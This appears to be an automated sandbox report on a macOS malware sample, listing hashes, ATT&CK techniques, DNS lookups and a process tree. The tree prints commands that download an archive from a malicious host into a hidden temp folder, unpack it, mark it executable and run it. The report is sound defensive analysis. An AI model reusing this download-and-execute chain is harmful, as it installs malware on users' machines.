Analysis

  • max time kernel
    38s
  • max time network
    126s
  • platform
    macos-10.15_amd64
  • resource
    macos-20241106-en
  • resource tags

    arch:amd64arch:i386image:macos-20241106-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
  • submitted
    17/02/2025, 18:06 UTC

General

  • Target

    Macos-Malware-Samples-main/0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d

  • Size

    48KB

  • MD5

    f1abdc7426dab256d30da578de73cb9d

  • SHA1

    3219d1b92dada589839cabc5e546561f51ddfe82

  • SHA256

    0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d

  • SHA512

    78b001ec08203b65f38cbc5fa05774b8dfd972f3f8096f5f31132d78906c73d39d59515d51cec0873ca011da68096ae650f6be566eaf3403b2d1ab7cbfa48f53

  • SSDEEP

    1536:cwBxH+LbSTkGJskNYKpfAtcMi7LqK24QIAtAmL:VZ+LbLEjhMcMi7uK21Ttl

Malware Config

Signatures

  • Exfiltration Over Alternative Protocol 1 TTPs 1 IoCs

    Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.

  • File Permission 1 TTPs

    Adversaries may modify file permissions/attributes to evade access control lists (ACLs) and access protected files.

  • Resource Forking 1 TTPs 1 IoCs

    Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.

  • Command and Scripting Interpreter 1 TTPs

    Adversaries may abuse Unix shell commands and scripts for execution.

Processes

  • /bin/sh
    sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d\""
    1⤵
      PID:484
    • /bin/bash
      sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d\""
      1⤵
        PID:484
      • /usr/bin/sudo
        sudo /bin/zsh -c /Users/run/Macos-Malware-Samples-main/0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d
        1⤵
          PID:484
          • /bin/zsh
            /bin/zsh -c /Users/run/Macos-Malware-Samples-main/0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d
            2⤵
              PID:485
            • /Users/run/Macos-Malware-Samples-main/0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d
              /Users/run/Macos-Malware-Samples-main/0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d
              2⤵
                PID:485
                • /usr/bin/python
                  /usr/bin/python -
                  3⤵
                    PID:486
                  • /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
                    /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python -
                    3⤵
                      PID:486
                      • /usr/bin/curl
                        /usr/bin/curl -qsL -m 1200 "http://bghui.storeyourstreams.xyz/tr/ioffers.tar.gz?ts=1739844739" -o /private/tmp/.mmstmp//stmp.tar.gz
                        4⤵
                          PID:487
                  • /bin/sh
                    sh -c "/usr/bin/tar -xvzf /private/tmp/.mmstmp//stmp.tar.gz -C /private/tmp/.mmstmp/"
                    1⤵
                      PID:490
                    • /bin/bash
                      sh -c "/usr/bin/tar -xvzf /private/tmp/.mmstmp//stmp.tar.gz -C /private/tmp/.mmstmp/"
                      1⤵
                        PID:490
                      • /usr/bin/tar
                        /usr/bin/tar -xvzf /private/tmp/.mmstmp//stmp.tar.gz -C /private/tmp/.mmstmp/
                        1⤵
                          PID:490
                        • /bin/sh
                          sh -c "/bin/chmod +x '/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos'"
                          1⤵
                            PID:491
                          • /bin/bash
                            sh -c "/bin/chmod +x '/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos'"
                            1⤵
                              PID:491
                            • /bin/chmod
                              /bin/chmod +x /private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos
                              1⤵
                                PID:491
                              • /bin/sh
                                sh -c "'/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos'"
                                1⤵
                                  PID:492
                                • /bin/bash
                                  sh -c "'/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos'"
                                  1⤵
                                    PID:492
                                  • /private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos
                                    /private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos
                                    1⤵
                                      PID:492
                                    • /usr/libexec/xpcproxy
                                      xpcproxy com.apple.nsurlstoraged
                                      1⤵
                                        PID:493
                                      • /usr/libexec/nsurlstoraged
                                        /usr/libexec/nsurlstoraged --privileged
                                        1⤵
                                          PID:493

                                        Network

                                        • flag-us
                                          DNS
                                          bghui.storeyourstreams.xyz
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          bghui.storeyourstreams.xyz
                                          IN A
                                          Response
                                        • flag-us
                                          DNS
                                          bghui.storeyourstreams.xyz
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          bghui.storeyourstreams.xyz
                                          IN A
                                        No results found
                                        • 8.8.8.8:53
                                          bghui.storeyourstreams.xyz
                                          dns
                                          144 B
                                          137 B
                                          2
                                          1

                                          DNS Request

                                          bghui.storeyourstreams.xyz

                                          DNS Request

                                          bghui.storeyourstreams.xyz

                                        MITRE ATT&CK Enterprise v15

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • /var/db/nsurlstoraged/dafsaData.bin

                                          Filesize

                                          54KB

                                          MD5

                                          64f469698e53d0c828b7f90acd306082

                                          SHA1

                                          bcc041b3849e1b0b4104ffeb46002207eeac54f3

                                          SHA256

                                          d74d0e429343f5e1b3e0b9437e048917c4343a30cff068739ea898bad8e37ffd

                                          SHA512

                                          a8334d1304f2fbd32cfd0ca35c289a45c450746cf3be57170cbbe87b723b1910c2e950a73c1fb82de9dc5ed623166d339a05fec3d78b861a9254dc2cb51fab5f

                                        We care about your privacy.

                                        This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.